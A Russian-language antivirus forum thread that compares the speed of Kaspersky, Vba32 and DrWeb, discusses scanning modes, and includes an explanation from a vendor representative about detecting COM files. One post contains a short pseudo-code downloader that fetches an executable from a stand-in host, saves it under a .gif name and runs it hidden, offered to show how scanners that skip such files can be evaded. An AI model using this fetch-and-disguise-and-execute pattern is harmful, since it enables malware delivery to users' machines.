-
Обсуждение антивирусов
Если теперь нужно еще и картинки проверять на вирусы, то скоро до 30% вычеслительных мощностей будет уходить на безопасность. Не надо поддаваться панике, ставим заплатку и пусть себе не проверяют антивирусы эти картинки, не барское это дело из-за одной дырки загружать пользовательские компьютеры, они и так бедные на пыхтят от нагрузки.
-
Будь в курсе!
Будь в курсе!
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
-
Re:Важно! Jpeg exploit (эксплоит)
Сообщение от
Minos
Если теперь нужно еще и картинки проверять на вирусы, то скоро до 30% вычеслительных мощностей будет уходить на безопасность. Не надо поддаваться панике, ставим заплатку и пусть себе не проверяют антивирусы эти картинки, не барское это дело из-за одной дырки загружать пользовательские компьютеры, они и так бедные на пыхтят от нагрузки.
30% это ещё по божески. Я вон с КАВ перешел на Vba32, так комп раза в 2 быстрее заработал
-
-
Re:Важно! Jpeg exploit (эксплоит)
Я тоже попробовал VBA: честно говоря, я бы выбрал Каспера ;D.
Но, к счастью, всё таки Доктор не так уж и плох, как говорят ;D
-
-
Re:Важно! Jpeg exploit (эксплоит)
Сообщение от
Iceman
Я тоже попробовал VBA: честно говоря, я бы выбрал Каспера ;D.
По надёжности, понятное дело
-
-
Re:Важно! Jpeg exploit (эксплоит)
Сообщение от
Geser
30% это ещё по божески. Я вон с КАВ перешел на Vba32, так комп раза в 2 быстрее заработал
По божески??? Я что, покупаю компьютер, для того что бы 2 дня в неделю заниматься ловлей вирусов? Нет мне, работать надо, а когда дело доходит до видео или компиляции чего нибудь эдакого - мне все мои 3000 "попугаев" нужны, и не собираюсь я львиную их долю отдавать за красивые глазки. Безопасность безопасностью, но и меру надо чувствовать.
На счет VBA, полностью согласен. На следующей неделе посмотрю как это чудо на P166 выглюдит в сравнении с DrWeb. Огорчает, что нет проверки "по формату", как в DrWeb. К стате DrWeb с включенной проверкой всех файлов тоже не очень шустро бегает. Давайте настоим на включении в VBA такой функции, мы же beta-тестеры .
-
Re:Важно! Jpeg exploit (эксплоит)
Сообщение от
Minos
Огорчает, что нет проверки "по формату", как в DrWeb. К стате DrWeb с включенной проверкой всех файлов тоже не очень шустро бегает. Давайте настоим на включении в VBA такой функции, мы же beta-тестеры
.
Я так понимаю что они в любом случае проверяют структуру файла, и дальше работают с ним в соответствии со структурой. Нужно будет спросить, если тут на заметят вопрос
-
-
Re:Важно! Jpeg exploit (эксплоит)
Сообщение от
Minos
К стате DrWeb с включенной проверкой всех файлов тоже не очень шустро бегает.
Это ерунда, ты переключи его в режим проверки файлов при открытии и запуске. Вот это весело. У меня когда Ослик работал и переодически читал из самораскрывающегося архива мег на 300 комп подвисал намертво.
-
-
Re:Важно! Jpeg exploit (эксплоит)
Сообщение от
Geser
Это ерунда, ты переключи его в режим проверки файлов при открытии и запуске. Вот это весело. У меня когда Ослик работал и переодически читал из самораскрывающегося архива мег на 300 комп подвисал намертво.
Я об этом речь и веду, производительность зависит не только от оптимизации алгоритмов, но и от объема проверяемых файлов. Вообще, теоретически, нужно, что бы монитор использовал не все записи базы, а только актуальные для данного компьютера. Вместо этого именно антивирус должен следить за закрытием дырок.
Полный заслон желательно ставить только в местах возможного проникновения вирусов, фильтры почты, сканирование сменных носителей, интернет трафик, а действия пользователя внутри "периметра" прверять по сокращенной программе (например только изменившиеся файлы и автозагрузку). Вместо этого в базы можно добавить информацию об уязвимостях и способах их перекрытия. Ведь значительная часть современных вирусов становится безполезной, если в системе закрыты все дырки. Выигрыш в скорости защет сокращения объема дурной работы должен быть значителен.
-
Re:Важно! Jpeg exploit (эксплоит)
Сообщение от
Minos
Я об этом речь и веду, производительность зависит не только от оптимизации алгоритмов, но и от объема проверяемых файлов. Вообще, теоретически, нужно, что бы монитор использовал не все записи базы, а только актуальные для данного компьютера. Вместо этого именно антивирус должен следить за закрытием дырок.
Полный заслон желательно ставить только в местах возможного проникновения вирусов, фильтры почты, сканирование сменных носителей, интернет трафик, а действия пользователя внутри "периметра" прверять по сокращенной программе (например только изменившиеся файлы и автозагрузку). Вместо этого в базы можно добавить информацию об уязвимостях и способах их перекрытия. Ведь значительная часть современных вирусов становится безполезной, если в системе закрыты все дырки. Выигрыш в скорости защет сокращения объема дурной работы должен быть значителен.
Ну представь себе что проскочил неизвестный вирус. На самом компе ты все файлы не проверяешь, значит через какое-то время даже если этот вирус добавлен в базу данных он будет спокойно жить пока ты не запустишь полное сканирование. Именно такие проблемы у ДрВеб с их "оптимальным режимом". Если ты уверен что не запускаешь на компе левые программы, в которых могут быть вирусы или трояны, то просто отключи монитор, и раз в неделю делай полное сканирование на всякий случай. А для чайников постоянная проверка всех файлов монитором необходима.
-
-
VBA
- Вес репутации
- 72
Re:Важно! Jpeg exploit (эксплоит)
Сообщение от
Geser
Я так понимаю что они в любом случае проверяют структуру файла, и дальше работают с ним в соответствии со структурой. Нужно будет спросить, если тут на заметят вопрос
Верно, формат файла всегда определяется и проверка далее идет в соответствии с форматом. Да, есть один такой неприятный формат файлов - досовские COM исполняемые файлы. Так вот, на самом деле они совсем не имеют формата и их невозможно распознать. Так что есть выбор: либо проверять все файлы с размером менее 64K как COM файлы и дополнительно тормозить систему (а COM-вирусы уже практически вымерли как класс), либо придумать что-то еще. Так вот, мы пошли вторым путем и в файлах, не имеющих исполняемого расширения (COM, EXE, PIF, SCR, ...), COM-вирусы в нормальном режиме сканирования не ищем. С точки зрения безопасности, проблем тут нет, с неправильным расширением такой файл запустить не получится, его все равно придется переименовать, а в этом случае монитор его поймает. Есть еще 'избыточный' режим, в котором поиск COM-фирусов производится во всех файлах подходящего размера, независимо от расширения, а также используется ряд других дополнительных методов поиска вирусов, которые обычно не нужны, но могут помочь в каких-либо крайне нестандартных случаях. Кстати, при тестировании антивируса на коллекции вирусов лучше избыточный режим включать, поскольку вирусы в коллекциях обычно лежат в переименованном виде.
Кстати, для антивирусного монитора у нас 'избыточный режим' и проверка архивов не используются и их невозможно включить (раньше эти опции были доступны в настройках). Но опыт показывает, что всегда находятся желающие защититься 'по полной программе', которые потом начинают жаловаться, что комп тормозит
-
-
Re:Важно! Jpeg exploit (эксплоит)
Сообщение от
Geser
Ну представь себе что проскочил неизвестный вирус. На самом компе ты все файлы не проверяешь, значит через какое-то время даже если этот вирус добавлен в базу данных он будет спокойно жить пока ты не запустишь полное сканирование. Именно такие проблемы у ДрВеб с их "оптимальным режимом". Если ты уверен что не запускаешь на компе левые программы, в которых могут быть вирусы или трояны, то просто отключи монитор, и раз в неделю делай полное сканирование на всякий случай. А для чайников постоянная проверка всех файлов монитором необходима.
Ну, проскачил, для жития ему необходимо запуститься, а тут его можно и накрыть при проверке автозагрузки или накрыть при запуске. Зачем проверять все подвернувшиеся файлы?
-
Re:Важно! Jpeg exploit (эксплоит)
Сообщение от
Minos
Ну, проскачил, для жития ему необходимо запуститься, а тут его можно и накрыть при проверке автозагрузки или накрыть при запуске. Зачем проверять все подвернувшиеся файлы?
Разные причины есть. Вот отключил ты зачем-то временно монитор, запустил случайно вирус, а потом включил, и долго ещё не узнаешь что у тебя вирус. А если проверять все файлы, то очень быстро монитор начнёт ругаться.
-
-
VBA
- Вес репутации
- 72
Re:Важно! Jpeg exploit (эксплоит)
Сообщение от
Minos
Ну, проскачил, для жития ему необходимо запуститься, а тут его можно и накрыть при проверке автозагрузки или накрыть при запуске. Зачем проверять все подвернувшиеся файлы?
Осталась только научиться отличать обычное открытие файла от его запуска
А это не так просто, например есть макровирусы в doc-файлах и скриптовые вирусы в текстовых файлах. Запуск интерпретатора (того же ворда, например) сам по себе не опасен. Проблемы начинаются, когда этот интерпретатор открывает файл, содержащий вирус, и начинает исполнять код, прочитанный оттуда.
-
-
Visiting Helper
- Вес репутации
- 76
-
-
VBA
- Вес репутации
- 72
Re:Обсуждение антивирусов
Сообщение от
Sanja
aga... a kak vam takoy variatn?
downloader.exe
UrlDownloadToFile("www.vir.com/vir.exe","c:\program.gif");
WinExec("c:\program.gif",SW_HIDE);
vba v prolete...
da i mnogie drugie toze
Установка 'проверять все файлы' поможет в данной ситуации
Также downloader.exe в данном случае является вредоносной программой и его вполне можно детектировать как трояна.
-
-
Visiting Helper
- Вес репутации
- 76
Re:Обсуждение антивирусов
nu skazem downloader.exe ne lovitsa a banner.gif lovitsa
no u 99.99% proverka stoit nikak ne "all files" tak 4to.. virus budet zapushen i zdelaet svoe delo
-
-
Re:Обсуждение антивирусов
Сообщение от
Sanja
nu skazem downloader.exe ne lovitsa a banner.gif lovitsa
no u 99.99% proverka stoit nikak ne "all files"
tak 4to.. virus budet zapushen i zdelaet svoe delo
Поэтому было бы неплохо если бы антивирус мог работать как локальный прокси, и фильтровать весь трафик.
-
-
Re:Обсуждение антивирусов
Сообщение от
Geser
Поэтому было бы неплохо если бы антивирус мог работать как локальный прокси, и фильтровать весь трафик.
Плюс скрипт-эвристик совместимый с IE, Mozilla и Opera. И вообще высший класс бы получился.